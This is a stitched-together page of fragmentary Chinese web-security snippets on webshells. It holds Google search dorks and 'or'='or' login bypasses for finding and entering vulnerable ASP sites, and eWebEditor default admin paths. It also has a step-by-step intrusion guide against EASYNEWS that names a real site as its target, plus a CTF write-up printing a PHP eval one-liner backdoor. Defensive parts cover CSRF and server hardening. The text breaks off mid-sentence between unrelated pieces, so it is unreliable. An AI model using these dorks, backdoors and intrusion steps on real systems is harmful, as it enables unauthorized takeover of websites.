webshell

By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<6.1.0,gbk+utf+big5 3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.php?goto=findpost&pid=54794&ptid=8706当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.分析和写EXP的过程中,得到t0by57的大力帮助.他PHP和JS都不错的哦!我也希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等.. ----------------------------------------------------------前言分隔线----------------------------------------------------------------------------- problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交

1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 　　2.到Google ,site:cq.cn inurl:asp 　　3.利用挖掘鸡和一个ASP木马. 　　文件名是login.asp 　　路径组是/manage/ 　　关键词是went.asp 　　用'or'='or'来登陆 　　4.关键字：Co Net MIB Ver 1.0网站后台管理系统 　　帐号密码为 'or'='or' 　　5.动感购物系统 　　inurl:help.asp登陆，如未注册成为会员! 　　upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞 　　6.默认数据库地址blogdata/acblog.asa 　　关键字：acblog 　　7.百度 /htdocs 　　注册里可以直接上传asa文件！ 　　8./Database/#newasp.mdb 　　关键词：NewAsp SiteManageSystem Version 　　9.用挖掘机 　　关键字：Powered by WEBBOY 　　页面：/upfile.asp 　　10.baidu中搜索关键字Ver5.0 Build 0519 　　(存在上传漏洞) 　　11.Upfile_Article.asp bbs/upfile.asp 　　输入关键字：powered

ewebeditor，相信玩黑的小牛和大牛们都已经非常熟悉了，而且运用的也相当的熟练了吧？其实这个本来也不想写了，想想用他拿了那么多站了，不留个纪念还是不好的，：） 首先：来段官方的介绍 eWebEditorTM 是什么？ 在线HTML编辑器！ eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具！ 如果有兴趣的话去官方了解详情： http://www.ewebeditor.net/ 先说重点吧，这个编辑器按脚本分主要有3个版本，ASP/ASPX/PHP/ 每个版本都可以利用的 ASP版: 这个版本其实个人感觉是影响最大，使用最多的一个了吧，早期很多asp站都用这个，当然现在也是大量的存在的。。。 怎么利用呢？一般用这个的默认后台的URL都是默认的： www.xxx.com/admin/ewebeditor/login_admin.asp 类似 www.xxx.com/ewebeditor/login_admin.asp www.xxx.com/admin/eweb/login_admin

一、前言 19年初，网上公开了2个Thinkphp5的RCE漏洞，漏洞非常好用，导致有很多攻击者用扫描器进行全网扫描。我们通过ips设备持续观察到大量利用这几个漏洞进行批量getshell的攻击流量，本文主要从流量角度简要分析和利用thinkphp进行攻击的全网扫描和getshell流量痕迹。 二、Thinkphp RCE漏洞和扫描流量 2.1漏洞原理回顾 2.1.15.0.x版本漏洞 原理在于Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php)，该类可以实现对HTTP请求的一些设置 Thinkphp支持配置“表单伪装变量”，默认情况下该变量值为_method，因此在method()中，可以通过“表单伪装变量”进行变量覆盖实现对该类任意函数的调用，并且$_POST作为函数的参数传入。可以构造请求来实现对Request类属性值的覆盖，例如覆盖filter属性（filter属性保存了用于全局过滤的函数），从而实现代码执行。 2.1.25.1.x-5.2.x版本漏洞 与5.0.x版本漏洞相似，漏洞点都存在于Request(thinkphp/library/think/Request.php)类中，其中： $method变量是$this->method，其等同于POST的“_method”参数值，可以利用覆盖

文件上传漏洞： 介绍： 一般Web站点会有用户注册功能，而当用户登入之后大多数情况下都会存在类似 头像上传、附件上传 一类的功能，这些功能点往往存在上传验证方式不严格的安全缺陷，是在Web渗透中非常关键的突破口，只要经过仔细测试分析来 绕过上传验证机制 ，往往会造成被攻击者直接上传Web后门，进而控制整个Web业务的控制权，复杂一点的情况是结合Web Server的解析漏洞来上传后门获取权限。 原理： 由于文件上传功能实现代码没有严格限制用户上传的 文件后缀以及文件类型 ，导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP文件，并能够将这些文件传递给 PHP 解释器，就可以在远程服务器上执行任意PHP脚本。 成功攻击条件： 1.可以上传任意脚本文件，且上传的文件能够 被Web服务器解析执行 ，具体来说就是存放上传文件的目录要有执行脚本的权限。 2.用户能够通过Web 访问这个文件 。如果文件上传后，不能通过Web访问，那么也不能成功实施攻击。 3.知道文件上传到服务器后的 存放路径和文件名称 ，因为许多Web应用都会修改上传文件的文件名称，那么这时就需要结合其他漏洞去获取到这些信息。如果不知道上传文件的存放路径和文件名称，即使你上传了也无法访问。 基本概念： >shell与webshell： 1）SHELL：对服务器的某种操作权限 2）WEBSHELL：以ASP、PHP

我们的防范是从入侵者角度来进行考虑，那么我们就首先需要知道入侵者的入侵方式。目前较为流行web入侵方式都是通过寻找程序的漏洞先得到网站的webshell然后再根据服务器的配置来找到相应的可以利用的方法进行提权，进而拿下服务器权限的。所以配合服务器来设置防止webshell是有效的方法。 1.防止数据库被非法下载应当说，有一点网络安全的管理员，都会把从网上下载的网站程序的默认数据库路径进行更改。当然也有一部分管理员非常粗心，拿到程序直接在自己的服务器上进行安装，甚至连说明文件都不进行删除，更不要说更改数据库路径了。这样黑客就可以通过直接从源码站点下载网站源程序，然后在本地测试找到默认的数据库，再通过下载数据库读取里面的用户信息和资料(一般是经过MD5加密的)找到管理入口进行登陆获得webshell。还有一种情况是由于程序出错暴出了网站数据库的路径，那么怎么防止这种情况的发生呢?我们可以添加mdb的扩展映射。高防服务器打开IIS添加一个MDB的映射，让mdb解析成其他下载不了的文件：“IIS属性”—“主目录”—“配置”—“映射”—“应用程序扩展”里面添加.mdb文件应用解析，至于用于解析它的文件大家可以自己进行选择，只要访问数据库文件出现无法访问就可以了。 这样做的好处是：1只是要是mdb后缀格式的数据库文件就肯定下载不了；2对服务器上所有的mdb文件都起作用

做题两分钟，工具两小时 题目描述：小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 所谓的php一句话： <?php @eval($_POST['shell']);?> 这个是PHP最常见的一句话木马的源码，通过post木马程序来实现木马的植入，eval()函数把字符串按照PHP代码来计算 这题又涉及到新的web工具， Cknife （因为现在网络上菜刀的后门太多了，所以不推荐菜刀了） 这次我用的是antsword， antsword的github链接 这题时间主要花在了解题工具上面，做题倒是很快。 1.右键添加数据 2.把url和连接密码输进去 因为这题提示是webshell，所以推测密码是shell，一开始我把那个一句话php放进去发现不对… 3.找到flag.txt cyberpeace{17b8c20c87ed744736dca537ddea2777} 来源： CSDN 作者： Wo_Knight 链接： https://blog.csdn.net/weixin_43092232/article/details/104590874

“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版，在该网站系统的留言本组件中就存在着数据过滤不严漏洞，如果网站是默认路径和默认文件名安装的话，入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 Step1 搜索入侵目标 使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站，在网站页面的底部版权声明处，往往会有关键字符为“WWW.52EASY.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索，就可以找到大量的入侵目标。 Step2 检测入侵条件 在这里，我们以网站“http://www.qswtj.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”，首先在浏览器地址栏中输入“http://www.qswtj.com/news/ebook/db/ebook.asp”，回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码，则说明该网站的留言本数据库文件没有改名，可以进行入侵。 Step3 在数据库中插入ASP后门 前面提到了该新闻系统的留言本插件存在过滤不严，因此我们可以通过提交发言，在数据库中插入“一句话木马”服务端代码： 在浏览器中访问“http://www

临近春节，某聚合支付平台被攻击篡改，导致客户提现银行卡信息被修改，支付订单被恶意回调，回调API接口的数据也被篡改，用户管理后台被任意登入，商户以及码商的订单被自动确认导致金额损失超过几十万，平台被攻击的彻底没办法了，通过朋友介绍，找到我们SINE安全公司寻求网站安全防护支持，针对客户支付通道并聚合支付网站目前发生被网站攻击，被篡改的问题，我们立即成立了网站安全应急响应小组，分析问题，找到漏洞根源，防止攻击篡改，将客户的损失降到最低。 我们将这次安全处理的解决过程分享出来，也是希望整个支付平台更加的安全。首先对接到客户这面，我们Sinesafe安排了几位从业十年的安全工程师来负责解决此次聚合支付平台被攻击，篡改的安全问题，了解客户支付网站目前发生的症状以及支付存在哪些漏洞，客户说支付平台运营一个月时出现过这些问题，然后在运营的第二个月陆续出现几次被攻击篡改的情况，客户自己的技术根据网站日志分析进攻路线排查加以封堵后，后续两个月支付均未被攻击,就在最近快过年的这几天，支付订单被篡改，很多未支付的订单竟然被篡改为成功支付，并从通道返回成功数据，导致平台损失较大，随即对支付通道进行了暂停，并联系码商停止支付接口。客户还反映支付链接被劫持，跳转到别人那去了，导致很多支付的订单都被支付到攻击者的账户中去了，损失简直不可言语。 很多商户以及集团使用聚合支付平台

CSRF原理介绍 CSRF漏洞定义 CSRF(cross-site request forery,跨站请求伪造),也被称为one click attack或者session riding,通过缩写为CSRF或者XSRF XSS与CSRF区别 1.XSS利用站点内的信任用户,盗取cookie 2.CSRF通过伪装成受信任用户请求信任的网站 CSRF漏洞原理 利用目标用户的合法身份,以目标用户的名字执行某些非法操作 如： 正常用户转账 http://www.xxx.com/pay.php?user=xx&money=100 恶意用户转账 http://www.xxx.com/pay.php?user=恶意用户&money=1000 CSRF漏洞利用 在修改密码的时候,抓包抓到修改密码的请求 http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change GET型CSRF代码分析 http://127.0.0.1/csrf/csrf_get.php?username=admin&password=admin CSRF防御措施 CSRF漏洞实质:服务器无法准确判断当前请求是否是合法用户的自定义操作 1.验证码防御 2.referer check防御 文件上传 靶场环境